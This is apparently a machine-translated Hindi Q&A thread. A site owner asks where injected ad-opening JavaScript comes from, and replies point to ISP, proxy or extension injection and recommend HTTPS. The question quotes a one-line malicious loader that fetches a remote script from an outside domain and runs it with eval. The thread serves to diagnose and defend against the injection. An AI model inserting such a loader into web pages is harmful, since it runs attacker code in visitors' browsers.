6
मैं इस मुद्दे पर थोड़ा सा खो गया हूं, इसलिए कृपया क्षमा करें। मुझे पता है कि इस बारे में SO पर अन्य धागे हैं लेकिन मुझे जवाब नहीं मिल रहा है।वेबसाइट पर मैलवेयर ढूंढना
साइट पर लोड होने पर यह कोई फर्क नहीं पड़ता कि उपयोगकर्ता कहां क्लिक करता है, विज्ञापनों के साथ ब्राउज़र में खुले अतिरिक्त टैब है।
क्या मैं अब तक ब्राउज़र कंसोल को देखकर लगता है करने में सक्षम था कि भरी हुई है कुछ JS फ़ाइल
http://cdn.mecash.ru/js/replace.js
इस फ़ाइल में शामिल
!function(w){if(w.self==w.top){var r=new XMLHttpRequest;r.onload=function(){eval(this.responseText)},r.open("get","//myclk.net/js/tx.js",!0),r.send()}}(window);
और द्वारा इस tx.js मुझे लगता है पर देख रहे हैं है यह हैकर द्वारा इंजेक्शन है।
कि मैं मेजबान पर फ़ाइलों को देखकर किया गया है और किसी भी शामिल हैं या यह js के बारे में कुछ नहीं मिल सकता है ..
कोई मेरी मदद कर सकते हैं और बता जहां या शायद सकते हैं कि कैसे मैं मिल सकती है यह?
असल में इस प्रकार की फ़ाइलों को अक्सर 'तृतीय पक्ष प्रॉक्सी' द्वारा इंजेक्शन दिया जाता है, यदि 'ब्राउज़र एक्सटेंशन इंस्टॉल किया गया' और 'कुछ आईएसपी' द्वारा भी सीधे पृष्ठ कोड के अनुरोध पर HTML कोड में स्वयं को इंजेक्शन दिया जाता है। इसका मतलब है कि आपको यह सर्वर पर आपके वास्तविक कोड में नहीं मिलेगा .. लेकिन क्लाइंट में यह जेएस शामिल है। मध्य संशोधनों में ऐसे व्यक्ति से बचने के लिए बेहतर 'https' का उपयोग करें। –
आईएसपी मैलवेयर जेएस -.- – Viney
डालने का धन्यवाद। तो दूसरे शब्दों में मैं फाइलों में खुदाई करना बंद कर सकता हूं क्योंकि मुझे यह नहीं मिलेगा। और यदि आईएसपी से है तो मैं समर्थन से भी संपर्क नहीं कर सकता? तो यहां विकल्प https और/या मेरे होस्टिंग प्रदाता को बदल रहा है? –